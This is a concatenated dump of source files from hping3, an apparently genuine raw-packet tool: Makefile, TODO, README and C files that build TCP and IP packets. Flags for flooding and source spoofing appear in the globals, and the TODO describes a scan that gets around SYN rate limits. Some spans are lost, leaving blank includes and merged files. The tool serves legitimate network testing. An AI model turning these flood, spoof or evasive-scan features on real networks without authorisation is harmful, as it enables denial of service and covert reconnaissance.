main.o getifname.o getlhs.o \ 23 | parseoptions.o datafiller.o \ 24 | datahandler.o gethostname.o \ 25 | binding.o getusec.o opensockraw.o \ 26 | logicmp.o waitpacket.o resolve.o \ 27 | sendip.o sendicmp.o sendudp.o \ 28 | sendtcp.o cksum.o statistics.o \ 29 | usage.o version.o antigetopt.o \ 30 | sockopt.o listen.o \ 31 | sendhcmp.o memstr.o rtt.o \ 32 | relid.o sendip_handler.o \ 33 | libpcap_stuff.o memlockall.o memunlockall.o \ 34 | memlock.o memunlock.o ip_opt_build.o \ 35 | display_ipopt.o sendrawip.o signal.o send.o \ 36 | strlcpy.o arsglue.o random.o scan.o \ 37 | hstring.o script.o interface.o \ 38 | adbuf.o hex.o apdutils.o sbignum.o \ 39 | sbignum-tables.o $(ARSOBJ) 40 | 41 | all: .depend hping3 42 | 43 | dep: .depend 44 | .depend: 45 | @echo Making dependences 46 | @$(CC) -MM *.c > .depend 47 | 48 | libars.a: $(ARSOBJ) 49 | $(AR) rc $@ $^ 50 | $(RANLIB) $@ 51 | 52 | hping3: byteorder.h $(OBJ) 53 | $(CC) -o hping3 $(CCOPT) $(DEBUG) $(OBJ) -L/usr/local/lib $(PCAP) @SOLARISLIB@ @TCL_LIB@ 54 | @echo 55 | ./hping3 -v 56 | @echo "use \`make strip' to strip hping3 binary" 57 | @echo "use \`make install' to install hping3" 58 | 59 | hping3-static: byteorder.h $(OBJ) 60 | $(CC) -static -o hping3-static $(CCOPT) $(DEBUG) $(OBJ) -L/usr/local/lib $(PCAP) @SOLARISLIB@ @TCL_LIB@ -ldl 61 | 62 | byteorder.h: 63 | ./configure 64 | 65 | .c.o: 66 | $(CC) -c $(CCOPT) $(DEBUG) $(COMPILE_TIME) $< 67 | 68 | clean: 69 | rm -rf hping3 *.o libars.a 70 | 71 | distclean: 72 | rm -rf hping3 *.o byteorder byteorder.h systype.h Makefile libars.a .depend 73 | 74 | install: hping3 75 | cp -f hping3 /usr/sbin/ 76 | chmod 755 /usr/sbin/hping3 77 | ln -s /usr/sbin/hping3 /usr/sbin/hping 78 | ln -s /usr/sbin/hping3 /usr/sbin/hping2 79 | @if [ -d ${INSTALL_MANPATH}/man8 ]; then \ 80 | cp ./docs/hping3.8 ${INSTALL_MANPATH}/man8; \ 81 | chmod 644 ${INSTALL_MANPATH}/man8/hping3.8; \ 82 | else \ 83 | echo "@@@@@@ WARNING @@@@@@"; \ 84 | echo "Can't install the man page: ${INSTALL_MANPATH}/man8 does not exist"; \ 85 | fi 86 | 87 | strip: hping3 88 | @ls -l ./hping3 89 | strip hping3 90 | @ls -l ./hping3 91 | 92 | include .depend 93 | -------------------------------------------------------------------------------- /TODO: -------------------------------------------------------------------------------- 1 | WARNING: Also try `grep FIXME *.c' 2 | 3 | HPING3 TODO. 4 | 5 | HPING2 bugs will no longer be handled, the hping2 code inside hping3 6 | is just a compatibility layer that will be dropped once the command 7 | line interface will be reimplemented as an hping script itself. 8 | 9 | DONE - split/rapd for IGRP (me) 10 | DONE - add more flags and broadcast address to 'hping iflist'. (me) 11 | DONE - ARS's apd and rapd support for IP and TCP options (me) 12 | 13 | - TUN/TAP support -- virtual interface creation, with Tcl channels 14 | - in 'hping recv' a timeout of zero or -1 should be specified using 15 | keyword like 'dontblock' and 'forever', like a number of packets 16 | equal to zero should be specified using the 'all' keyword. 17 | - compression primitives 'hping zip', 'hping unzip'. 18 | - recv should support -nobadsum and -notrunc to don't receive packets 19 | containing layers with the bad checksum or truncated flags set. 20 | - 'hping recvraw' should support a -split option to return the raw data 21 | splitted in layers in a flat TCL list where elements are: 22 | {layer0name binary0 layer1name binary1 ...} 23 | - Ability to specify the outgoing interface regardless of the 24 | destination IP address. (Should be impossible without datalink access) 25 | - 'hping setif ?-promisc? ?-broadcast? ifname' 26 | - 'hping build ?-nocompile? packet' APD->binary 27 | - 'hping describe packet' binary->APD 28 | - IPv6 support in ARS (some still-non-working patch received) 29 | - The hping standard library. that's the real development area 30 | to make the scripting capabilities useful. The library should 31 | contain a reasonable number of functions to make it more handy, 32 | and a number of standard exploits should be rewritten in hping 33 | as examples. Also support for fragmentation, TCP reassembly, 34 | and so on will be useful. 35 | - A short way to invoke scripts in 'path' (/usr/local/lib/hping/*.htcl), 36 | something like: "hping script.htcl". Hping may sense it's an .htlc 37 | file and not a strange-locking domain name ;) and perform a lookup 38 | in the standard library of scripts (~/.hping/*.htcl for example). 39 | - Convert all the raw-socket stuff (used in output) to datalink. 40 | - Implement a scanner, with random nmap and hping features, and also: 41 | FIN scan follwed by a SYN scan, this can be useful 42 | since many admins limit the incoming SYN packets, so the 43 | SYN or connect() scan is too slow, while the FIN scan 44 | show filtered ports as open. We can do a FIN scan, then scan 45 | the ports that appears to be open with SYN. Should 46 | be both fast and accurate. 47 | 48 | TODO (about TCL scripting, but for future releases) 49 | 50 | - 'hping iflist' should include the link header length (or -1 if it's unknown) 51 | - 'hping recv' and 'recvraw' should have a -layer2 option to return the whole 52 | level 2 frame. The same for 'hping send' and 'hping sendraw'. 53 | - 'hping guesslhs' should run the ipv4 header detection and return the lhs 54 | -------------------------------------------------------------------------------- /README: -------------------------------------------------------------------------------- 1 | hping3 README file 2 | antirez@invece.org 3 | 4 | DESCRIPTION 5 | 6 | hping3 is a network tool able to send custom TCP/IP 7 | packets and to display target replies like ping do with 8 | ICMP replies. hping3 can handle fragmentation, and 9 | almost arbitrary packet size and content, using the 10 | command line interface. 11 | 12 | Since version 3, hping implements scripting capabilties, 13 | read the API.txt file under the /docs directory to know 14 | more about it. 15 | 16 | As a command line utility, hping is useful to test at 17 | many kind of networking devices like firewalls, routers, 18 | and so. It can be used as a traceroute alike program over all 19 | the supported protocols, firewalk usage, OS fingerprinting, 20 | port-scanner (see the --scan option introduced with hping3), 21 | TCP/IP stack auditing. 22 | 23 | It's also really a good didactic tool to learn TCP/IP. 24 | 25 | Using Tcl/Tk scripting much more can be done, because 26 | while the hping3 packet generation code is actually the 27 | hping2 put there mainly for compatibility with the command 28 | line interface, all the real news are about scripting. 29 | 30 | See the libs directory for example scripts. To run 31 | the example scripts type: 32 | 33 | hping3 exec ScriptName.htcl 34 | 35 | hping3 is developed and manteined by antirez@invece.org 36 | with the help of other hackers, and comes under GPL version 37 | 2 of license. Development is open so you can send me 38 | patches/suggestions/affronts without inhibitions. 39 | 40 | Please check the AUTHORS file for a list of people that 41 | contribued with code, ideas, bug reports. 42 | 43 | Also vim developer, ee.lbl.gov for tcpdump and GNU in general. 44 | 45 | DOCUMENTATION 46 | 47 | For the hping3 API check docs/API.txt 48 | 49 | You can find documentation about hping3 specific functions 50 | at http://wiki.hping.org 51 | 52 | Make sure to check the page at http://wiki.hping.org/34 53 | 54 | DOWNLOAD 55 | 56 | The hping3 primary download site is the following: 57 | 58 | http://www.hping.org 59 | 60 | ---------------------------------------------------------------- 61 | How to get the hping3 source code from the anonymous CVS server 62 | ---------------------------------------------------------------- 63 | 64 | $ cvs -d :pserver:anonymous@cvs.hping2.sourceforge.net:/cvsroot/hping2 login 65 | 66 | CVS will ask for the password, just press enter, no password is required 67 | 68 | than type the following to download the full source code. 69 | 70 | $ cvs -z8 -d :pserver:anonymous@cvs.hping2.sourceforge.net:/cvsroot/hping2 checkout hping3s 71 | 72 | ----------------------------------- 73 | How to update your source code tree 74 | ----------------------------------- 75 | 76 | change the current directory to /somewhere/hping2, than just type: 77 | 78 | $ cvs update 79 | 80 | REQUIREMENTS 81 | 82 | A supported unix-like OS, gcc, root access. 83 | 84 | Libpcap. 85 | 86 | Tcl/Tk is optional but strongly suggested. 87 | 88 | INSTALLATION 89 | 90 | see INSTALL file. 91 | 92 | have fun, 93 | antirez 94 | -------------------------------------------------------------------------------- /rtt.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: rtt.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 3$ 9 | */ 10 | 11 | /* $Id: rtt.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | 16 | #include "hping2.h" 17 | #include "globals.h" 18 | 19 | void minavgmax(float ms_delay) 20 | { 21 | static int avg_counter = 0; 22 | 23 | if (rtt_min == 0 || ms_delay < rtt_min) 24 | rtt_min = ms_delay; 25 | if (rtt_max == 0 || ms_delay > rtt_max) 26 | rtt_max = ms_delay; 27 | avg_counter++; 28 | rtt_avg = (rtt_avg*(avg_counter-1)/avg_counter)+(ms_delay/avg_counter); 29 | } 30 | 31 | int rtt(int *seqp, int recvport, float *ms_delay) 32 | { 33 | long sec_delay = 0, usec_delay = 0; 34 | int i, tablepos = -1, status; 35 | 36 | if (*seqp != 0) { 37 | for (i = 0; i < TABLESIZE; i++) 38 | if (delaytable[i].seq == *seqp) { 39 | tablepos = i; 40 | break; 41 | } 42 | } else { 43 | for (i=0; i$ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: sendtcp.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | #include "hping2.h" 22 | #include "globals.h" 23 | 24 | void send_tcp(void) 25 | { 26 | int packet_size; 27 | int tcp_opt_size = 0; 28 | char *packet, *data; 29 | struct mytcphdr *tcp; 30 | struct pseudohdr *pseudoheader; 31 | unsigned char *tstamp; 32 | 33 | if (opt_tcp_timestamp) 34 | tcp_opt_size = 12; 35 | 36 | packet_size = TCPHDR_SIZE + tcp_opt_size + data_size; 37 | packet = malloc(PSEUDOHDR_SIZE + packet_size); 38 | if (packet == NULL) { 39 | perror("[send_tcphdr] malloc()"); 40 | return; 41 | } 42 | pseudoheader = (struct pseudohdr*) packet; 43 | tcp = (struct mytcphdr*) (packet+PSEUDOHDR_SIZE); 44 | tstamp = (unsigned char*) (packet+PSEUDOHDR_SIZE+TCPHDR_SIZE); 45 | data = (char*) (packet+PSEUDOHDR_SIZE+TCPHDR_SIZE+tcp_opt_size); 46 | 47 | memset(packet, 0, PSEUDOHDR_SIZE+packet_size); 48 | 49 | /* tcp pseudo header */ 50 | memcpy(&pseudoheader->saddr, &local.sin_addr.s_addr, 4); 51 | memcpy(&pseudoheader->daddr, &remote.sin_addr.s_addr, 4); 52 | pseudoheader->protocol = 6; /* tcp */ 53 | pseudoheader->lenght = htons(TCPHDR_SIZE+tcp_opt_size+data_size); 54 | 55 | /* tcp header */ 56 | tcp->th_dport = htons(dst_port); 57 | tcp->th_sport = htons(src_port); 58 | 59 | /* sequence number and ack are random if not set */ 60 | tcp->th_seq = (set_seqnum) ? htonl(tcp_seqnum) : htonl(rand()); 61 | tcp->th_ack = (set_ack) ? htonl(tcp_ack) : htonl(rand()); 62 | 63 | tcp->th_off = src_thoff + (tcp_opt_size >> 2); 64 | tcp->th_win = htons(src_winsize); 65 | tcp->th_flags = tcp_th_flags; 66 | 67 | /* tcp timestamp option */ 68 | if (opt_tcp_timestamp) { 69 | __u32 randts = rand() ^ (rand() << 16); 70 | tstamp[0] = tstamp[1] = 1; /* NOOP */ 71 | tstamp[2] = 8; 72 | tstamp[3] = 10; /* 10 bytes, kind+len+T1+T2 */ 73 | memcpy(tstamp+4, &randts, 4); /* random */ 74 | memset(tstamp+8, 0, 4); /* zero */ 75 | } 76 | 77 | /* data */ 78 | data_handler(data, data_size); 79 | 80 | /* compute checksum */ 81 | #ifdef STUPID_SOLARIS_CHECKSUM_BUG 82 | tcp->th_sum = packet_size; 83 | #else 84 | tcp->th_sum = cksum((u_short*) packet, PSEUDOHDR_SIZE + 85 | packet_size); 86 | #endif 87 | 88 | /* adds this pkt in delaytable */ 89 | delaytable_add(sequence, src_port, time(NULL), get_usec(), S_SENT); 90 | 91 | /* send packet */ 92 | send_ip_handler(packet+PSEUDOHDR_SIZE, packet_size); 93 | free(packet); 94 | 95 | sequence++; /* next sequence number */ 96 | if (!opt_keepstill) 97 | src_port = (sequence + initsport) % 65536; 98 | 99 | if (opt_force_incdport) 100 | dst_port++; 101 | } 102 | -------------------------------------------------------------------------------- /globals.h: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: globals.h$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:47 MET 1999$ 8 | * $rev: 9$ 9 | */ 10 | 11 | /* $Id: globals.h,v 1.3 2004/06/18 09:53:11 antirez Exp $ */ 12 | 13 | #ifndef _GLOBALS_H 14 | #define _GLOBALS_H 15 | 16 | extern float 17 | rtt_min, 18 | rtt_max, 19 | rtt_avg; 20 | 21 | extern unsigned int 22 | tcp_th_flags, 23 | linkhdr_size, 24 | h_if_mtu, 25 | virtual_mtu, 26 | ip_frag_offset, 27 | signlen, 28 | lsr_length, 29 | ssr_length, 30 | ip_tos, 31 | set_seqnum, 32 | tcp_seqnum, 33 | set_ack, 34 | ip_header_length, 35 | tcp_ack; 36 | 37 | extern unsigned short int 38 | data_size; 39 | 40 | extern int opt_debug, 41 | sockpacket, 42 | sockraw, 43 | sent_pkt, 44 | recv_pkt, 45 | out_of_sequence_pkt, 46 | sending_wait, 47 | opt_rawipmode, 48 | opt_icmpmode, 49 | opt_udpmode, 50 | opt_scanmode, 51 | opt_listenmode, 52 | opt_waitinusec, 53 | opt_numeric, 54 | opt_gethost, 55 | opt_quiet, 56 | opt_relid, 57 | opt_fragment, 58 | opt_df, 59 | opt_mf, 60 | opt_debug, 61 | opt_verbose, 62 | opt_winid_order, 63 | opt_keepstill, 64 | opt_datafromfile, 65 | opt_hexdump, 66 | opt_contdump, 67 | opt_sign, 68 | opt_safe, 69 | opt_end, 70 | opt_traceroute, 71 | opt_seqnum, 72 | opt_incdport, 73 | opt_force_incdport, 74 | opt_icmptype, 75 | opt_icmpcode, 76 | opt_rroute, 77 | opt_tcpexitcode, 78 | opt_badcksum, 79 | opt_tr_keep_ttl, 80 | opt_tcp_timestamp, 81 | opt_clock_skew, 82 | cs_window, 83 | cs_window_shift, 84 | cs_vector_len, 85 | opt_tr_stop, 86 | opt_tr_no_rtt, 87 | opt_rand_dest, 88 | opt_rand_source, 89 | opt_lsrr, 90 | opt_ssrr, 91 | opt_beep, 92 | opt_flood, 93 | tcp_exitcode, 94 | src_ttl, 95 | src_id, 96 | base_dst_port, 97 | dst_port, 98 | src_port, 99 | initsport, 100 | sequence, 101 | src_winsize, 102 | src_thoff, 103 | count, 104 | ctrlzbind, 105 | delaytable_index, 106 | eof_reached, 107 | icmp_ip_version, 108 | icmp_ip_ihl, 109 | icmp_ip_tos, 110 | icmp_ip_tot_len, 111 | icmp_ip_id, 112 | icmp_ip_srcport, 113 | icmp_ip_dstport, 114 | opt_force_icmp, 115 | icmp_ip_protocol, 116 | icmp_cksum, 117 | raw_ip_protocol; 118 | 119 | extern unsigned char lsr[255], 120 | ssr[255]; 121 | 122 | extern char ifname[1024], 123 | ifstraddr[1024], 124 | datafilename[1024], 125 | targetname[1024], 126 | targetstraddr[1024], 127 | spoofaddr[1024], 128 | icmp_ip_srcip[1024], 129 | icmp_ip_dstip[1024], 130 | icmp_gwip[1024], 131 | sign[1024], 132 | rsign[1024], 133 | ip_opt[40], 134 | ip_optlen, 135 | *opt_scanports; 136 | 137 | extern struct sockaddr_in icmp_ip_src, icmp_ip_dst, icmp_gw, local, remote; 138 | extern struct itimerval usec_delay; 139 | extern volatile struct delaytable_element delaytable[TABLESIZE]; 140 | extern struct hcmphdr *hcmphdr_p; 141 | 142 | #include 143 | extern pcap_t *pcapfp; 144 | extern char errbuf[PCAP_ERRBUF_SIZE]; 145 | extern struct pcap_pkthdr hdr; 146 | 147 | #endif /* _GLOBALS_H */ 148 | -------------------------------------------------------------------------------- /strlcpy.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: strLcpy.c$ 4 | * $author: Nicolas Jombart $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * *copyright: (c) 1998 Todd C. Miller $ 7 | * $license: This software is under GPL version 2 of license$ 8 | * $date: Wed Feb 13 17:02:32 CET 2002$ 9 | * $rev:$ 10 | */ 11 | 12 | /* $OpenBSD: strlcpy.c,v 1.4 1999/05/01 18:56:41 millert Exp $ */ 13 | 14 | /* 15 | * Copyright (c) 1998 Todd C. Miller 16 | * All rights reserved. 17 | * 18 | * Redistribution and use in source and binary forms, with or without 19 | * modification, are permitted provided that the following conditions 20 | * are met: 21 | * 1. Redistributions of source code must retain the above copyright 22 | * notice, this list of conditions and the following disclaimer. 23 | * 2. Redistributions in binary form must reproduce the above copyright 24 | * notice, this list of conditions and the following disclaimer in the 25 | * documentation and/or other materials provided with the distribution. 26 | * 3. The name of the author may not be used to endorse or promote products 27 | * derived from this software without specific prior written permission. 28 | * 29 | * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, 30 | * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY 31 | * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 32 | * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 33 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 34 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 35 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 36 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 37 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 38 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 39 | */ 40 | 41 | /* $Id: strlcpy.c,v 1.1.1.1 2003/08/31 17:23:55 antirez Exp $ */ 42 | 43 | /* This function comes from BSD */ 44 | #if !defined(__FreeBSD__) && !defined(__OpenBSD__) && !defined(__NetBSD__) && \ 45 | !defined(__bsdi__) && !defined(__APPLE__) 46 | #include 47 | #include 48 | 49 | /* 50 | * Copy src to string dst of size siz. At most siz-1 characters 51 | * will be copied. Always NUL terminates (unless siz == 0). 52 | * Returns strlen(src); if retval >= siz, truncation occurred. 53 | */ 54 | size_t strlcpy(dst, src, siz) 55 | char *dst; 56 | const char *src; 57 | size_t siz; 58 | { 59 | register char *d = dst; 60 | register const char *s = src; 61 | register size_t n = siz; 62 | 63 | /* Copy as many bytes as will fit */ 64 | if (n != 0 && --n != 0) { 65 | do { 66 | if ((*d++ = *s++) == 0) 67 | break; 68 | } while (--n != 0); 69 | } 70 | 71 | /* Not enough room in dst, add NUL and traverse rest of src */ 72 | if (n == 0) { 73 | if (siz != 0) 74 | *d = '\0'; /* NUL-terminate dst */ 75 | while (*s++) 76 | ; 77 | } 78 | 79 | return(s - src - 1); /* count does not include NUL */ 80 | } 81 | 82 | #endif /* ! __*BSD__ */ 83 | -------------------------------------------------------------------------------- /interface.h: -------------------------------------------------------------------------------- 1 | #ifndef __HPING_INTERFACE_H 2 | #define __HPING_INTERFACE_H 3 | 4 | #ifndef _LINUX_MII_H 5 | #define _LINUX_MII_H 6 | 7 | /* network interface ioctl's for MII commands */ 8 | #ifndef SIOCGMIIPHY 9 | #define SIOCGMIIPHY (SIOCDEVPRIVATE) /* Read from current PHY */ 10 | #define SIOCGMIIREG (SIOCDEVPRIVATE+1) /* Read any PHY register */ 11 | #define SIOCSMIIREG (SIOCDEVPRIVATE+2) /* Write any PHY register */ 12 | #define SIOCGPARAMS (SIOCDEVPRIVATE+3) /* Read operational parameters */ 13 | #define SIOCSPARAMS (SIOCDEVPRIVATE+4) /* Set operational parameters */ 14 | #endif 15 | 16 | /* This data structure is used for all the MII ioctl's */ 17 | struct mii_data { 18 | __u16 phy_id; 19 | __u16 reg_num; 20 | __u16 val_in; 21 | __u16 val_out; 22 | }; 23 | 24 | /* Basic Mode Control Register */ 25 | #define MII_BMCR 0x00 26 | #define MII_BMCR_RESET 0x8000 27 | #define MII_BMCR_LOOPBACK 0x4000 28 | #define MII_BMCR_100MBIT 0x2000 29 | #define MII_BMCR_AN_ENA 0x1000 30 | #define MII_BMCR_ISOLATE 0x0400 31 | #define MII_BMCR_RESTART 0x0200 32 | #define MII_BMCR_DUPLEX 0x0100 33 | #define MII_BMCR_COLTEST 0x0080 34 | 35 | /* Basic Mode Status Register */ 36 | #define MII_BMSR 0x01 37 | #define MII_BMSR_CAP_MASK 0xf800 38 | #define MII_BMSR_100BASET4 0x8000 39 | #define MII_BMSR_100BASETX_FD 0x4000 40 | #define MII_BMSR_100BASETX_HD 0x2000 41 | #define MII_BMSR_10BASET_FD 0x1000 42 | #define MII_BMSR_10BASET_HD 0x0800 43 | #define MII_BMSR_NO_PREAMBLE 0x0040 44 | #define MII_BMSR_AN_COMPLETE 0x0020 45 | #define MII_BMSR_REMOTE_FAULT 0x0010 46 | #define MII_BMSR_AN_ABLE 0x0008 47 | #define MII_BMSR_LINK_VALID 0x0004 48 | #define MII_BMSR_JABBER 0x0002 49 | #define MII_BMSR_EXT_CAP 0x0001 50 | 51 | #define MII_PHY_ID1 0x02 52 | #define MII_PHY_ID2 0x03 53 | 54 | /* Auto-Negotiation Advertisement Register */ 55 | #define MII_ANAR 0x04 56 | /* Auto-Negotiation Link Partner Ability Register */ 57 | #define MII_ANLPAR 0x05 58 | #define MII_AN_NEXT_PAGE 0x8000 59 | #define MII_AN_ACK 0x4000 60 | #define MII_AN_REMOTE_FAULT 0x2000 61 | #define MII_AN_ABILITY_MASK 0x07e0 62 | #define MII_AN_FLOW_CONTROL 0x0400 63 | #define MII_AN_100BASET4 0x0200 64 | #define MII_AN_100BASETX_FD 0x0100 65 | #define MII_AN_100BASETX_HD 0x0080 66 | #define MII_AN_10BASET_FD 0x0040 67 | #define MII_AN_10BASET_HD 0x0020 68 | #define MII_AN_PROT_MASK 0x001f 69 | #define MII_AN_PROT_802_3 0x0001 70 | 71 | /* Auto-Negotiation Expansion Register */ 72 | #define MII_ANER 0x06 73 | #define MII_ANER_MULT_FAULT 0x0010 74 | #define MII_ANER_LP_NP_ABLE 0x0008 75 | #define MII_ANER_NP_ABLE 0x0004 76 | #define MII_ANER_PAGE_RX 0x0002 77 | #define MII_ANER_LP_AN_ABLE 0x0001 78 | 79 | #endif /* _LINUX_MII_H */ 80 | 81 | #define HPING_IFNAME_LEN 24 82 | #define HPING_IFACE_MAX 64 83 | #define HPING_IFADDR_MAX 16 84 | 85 | /* hping interface rappresentation */ 86 | struct hpingif { 87 | char hif_name[HPING_IFNAME_LEN]; 88 | in_addr_t hif_addr[HPING_IFADDR_MAX]; /* ipv4 addresses */ 89 | in_addr_t hif_baddr[HPING_IFADDR_MAX]; /* ipv4 broadcast addresses */ 90 | int hif_naddr; 91 | int hif_loopback; 92 | int hif_ptp; 93 | int hif_promisc; 94 | int hif_broadcast; 95 | int hif_nolink; /* only set with MII-capable devices */ 96 | int hif_mtu; 97 | int hif_index; /* only useful for linux sockpacket version */ 98 | }; 99 | 100 | int hping_get_interfaces(struct hpingif *hif, int ilen); 101 | 102 | #endif 103 | -------------------------------------------------------------------------------- /sendip.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: sendip.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:49 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: sendip.c,v 1.2 2004/04/09 23:38:56 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | #include "hping2.h" 22 | #include "globals.h" 23 | 24 | void send_ip (char* src, char *dst, char *data, unsigned int datalen, 25 | int more_fragments, unsigned short fragoff, char *options, 26 | char optlen) 27 | { 28 | char *packet; 29 | int result, 30 | packetsize; 31 | struct myiphdr *ip; 32 | 33 | packetsize = IPHDR_SIZE + optlen + datalen; 34 | if ( (packet = malloc(packetsize)) == NULL) { 35 | perror("[send_ip] malloc()"); 36 | return; 37 | } 38 | 39 | memset(packet, 0, packetsize); 40 | ip = (struct myiphdr*) packet; 41 | 42 | /* copy src and dst address */ 43 | memcpy(&ip->saddr, src, sizeof(ip->saddr)); 44 | memcpy(&ip->daddr, dst, sizeof(ip->daddr)); 45 | 46 | /* build ip header */ 47 | ip->version = 4; 48 | ip->ihl = (IPHDR_SIZE + optlen + 3) >> 2; 49 | ip->tos = ip_tos; 50 | 51 | #if defined OSTYPE_DARWIN || defined OSTYPE_FREEBSD || defined OSTYPE_NETBSD || defined OSTYPE_BSDI 52 | /* FreeBSD */ 53 | /* NetBSD */ 54 | ip->tot_len = packetsize; 55 | #else 56 | /* Linux */ 57 | /* OpenBSD */ 58 | ip->tot_len = htons(packetsize); 59 | #endif 60 | 61 | if (!opt_fragment) 62 | { 63 | ip->id = (src_id == -1) ? 64 | htons((unsigned short) rand()) : 65 | htons((unsigned short) src_id); 66 | } 67 | else /* if you need fragmentation id must not be randomic */ 68 | { 69 | /* FIXME: when frag. enabled sendip_handler shold inc. ip->id */ 70 | /* for every frame sent */ 71 | ip->id = (src_id == -1) ? 72 | htons(getpid() & 255) : 73 | htons((unsigned short) src_id); 74 | } 75 | 76 | #if defined OSTYPE_DARWIN || defined OSTYPE_FREEBSD || defined OSTYPE_NETBSD | defined OSTYPE_BSDI 77 | /* FreeBSD */ 78 | /* NetBSD */ 79 | ip->frag_off |= more_fragments; 80 | ip->frag_off |= fragoff >> 3; 81 | #else 82 | /* Linux */ 83 | /* OpenBSD */ 84 | ip->frag_off |= htons(more_fragments); 85 | ip->frag_off |= htons(fragoff >> 3); /* shift three flags bit */ 86 | #endif 87 | 88 | ip->ttl = src_ttl; 89 | if (opt_rawipmode) ip->protocol = raw_ip_protocol; 90 | else if (opt_icmpmode) ip->protocol = 1; /* icmp */ 91 | else if (opt_udpmode) ip->protocol = 17; /* udp */ 92 | else ip->protocol = 6; /* tcp */ 93 | ip->check = 0; /* always computed by the kernel */ 94 | 95 | /* copies options */ 96 | if (options != NULL) 97 | memcpy(packet+IPHDR_SIZE, options, optlen); 98 | 99 | /* copies data */ 100 | memcpy(packet + IPHDR_SIZE + optlen, data, datalen); 101 | 102 | if (opt_debug == TRUE) 103 | { 104 | unsigned int i; 105 | 106 | for (i=0; i 8 | 9 | static char hval[256] = { 10 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 11 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 12 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 13 | 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 255, 255, 255, 255, 255, 255, 14 | 255, 10, 11, 12, 13, 14, 15, 255, 255, 255, 255, 255, 255, 255, 255, 255, 15 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 16 | 255, 10, 11, 12, 13, 14, 15, 255, 255, 255, 255, 255, 255, 255, 255, 255, 17 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 18 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 19 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 20 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 21 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 22 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 23 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 24 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 25 | 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, }; 26 | 27 | static char hcharset[16] = "0123456789abcdef"; 28 | 29 | /* Convert hex data in the string pointed by 'hexstr' in binary, and 30 | * write the result of the conversion to 'dest'. 31 | * On success 0 is returned, on error non-zero. 32 | * 'dest' should point to at least len/2 bytes of data, 33 | * len must be an even number. 34 | * If len == -1, the function calls strlen() against 'hexstr' to 35 | * get the length. */ 36 | int hextobin(void *dest, char *hexstr, int len) 37 | { 38 | int i, binlen; 39 | char *s = hexstr; 40 | unsigned char *d = dest; 41 | 42 | if (len == -1) 43 | len = strlen(hexstr); 44 | if (len % 2) 45 | return 1; /* error, odd count */ 46 | binlen = len / 2; 47 | for (i = 0; i < binlen; i++) { 48 | int high, low; 49 | 50 | high = hval[((unsigned)*s)&0xFF]; 51 | low = hval[((unsigned)*(s+1))&0xFF]; 52 | if (high == 255 || low == 255) 53 | return 1; /* invalid char in hex string */ 54 | high <<= 4; 55 | *d = high|low; 56 | d++; 57 | s+=2; 58 | } 59 | return 0; 60 | } 61 | 62 | /* Convert binary data pointed by 'bin' of 